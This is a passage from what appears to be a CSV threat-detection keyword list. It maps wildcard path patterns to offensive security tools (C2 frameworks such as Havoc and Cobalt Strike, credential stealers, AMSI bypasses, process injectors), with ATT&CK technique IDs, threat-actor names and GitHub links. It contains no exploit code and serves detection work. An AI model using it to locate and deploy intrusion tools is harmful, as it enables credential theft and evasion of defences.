T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/Cybellum*,offensive_tool_keyword,Github Username,Zero day code injection and vulnerabilities github repo,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Cybellum,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/CyDefUnicorn*,offensive_tool_keyword,Github Username,pentest tools repo,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/CyDefUnicorn,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/D1rkInject.git*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*/d4em0n/exrop*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*/daap-get-library.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/DAMP.git*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*/DanMcInerney/ridenum*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/daphne.git*,offensive_tool_keyword,daphne,evade auditd by tampering via ptrace,T1054.004 - T1012 - T1057,TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/daphne,1,1,N/A,8,1,12,2,2023-08-03T08:31:40Z,2023-07-31T11:57:29Z -*/daphne-x64*,offensive_tool_keyword,daphne,evade auditd by tampering via ptrace,T1054.004 - T1012 - T1057,TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/daphne,1,1,N/A,8,1,12,2,2023-08-03T08:31:40Z,2023-07-31T11:57:29Z -*/darkarmour.git*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*/DarkCoderSc/*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*/darkexe.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/darkhotel.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/DarkLoadLibrary.git*,offensive_tool_keyword,DarkLoadLibrary,LoadLibrary for offensive operations,T1071.001 - T1055.002 - T1055.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/DarkLoadLibrary,1,1,N/A,10,9,874,184,2021-10-22T07:27:58Z,2021-06-17T08:33:47Z -*/darkweb2017-top100.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/DarkWidow.git*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*/data/attacks/*.txt*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*/data/auxiliary/gather*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/data/empire.db*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/data/exploits/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/data/shellcode*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/DavRelayUp.git*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*/DavRelayUp/*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*/daytime.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dazzleUP.git*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*/db2_default_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/db2-das-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dbc2Loader*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*/DCOM Lateral Movement/*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*/dcomhijack.git*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,1,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*/DCOMPotato.git*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,1,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*/DcRat.git*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*/DcRat.sln*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*/dcrypt.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*/dcrypt_setup.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*/dcsync_*.txt,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/DeathStar/DeathStar.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/deb.parrot.sh/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/DebugAmsi.git*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*/decrypt-chrome-passwords*,offensive_tool_keyword,decrypt-chrome-passwords,A simple program to decrypt chrome password saved on your machine.,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/ohyicong/decrypt-chrome-passwords,1,1,N/A,10,7,673,147,2023-10-02T18:22:13Z,2020-12-28T15:11:12Z -*/decrypted.dmp*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*/deepce.sh *--install*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/defanger.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/DefaultCreds_db.json*,offensive_tool_keyword,DefaultCreds-cheat-sheet,One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password,T1110.001 - T1110.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/ihebski/DefaultCreds-cheat-sheet,1,1,N/A,N/A,10,4664,610,2023-07-15T22:16:49Z,2021-01-01T19:02:36Z -*/defender-exclusions/*defender*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/defender-exclusions/*exclusion*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/Defense_Evasion.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/DelegationBOF/*,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*/DelegationBOF/*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*/deluge-rpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/demiguise.py*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,1,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -*/demo_bof.c*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/demon.x64.bin*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/demon.x64.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/demon1.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - 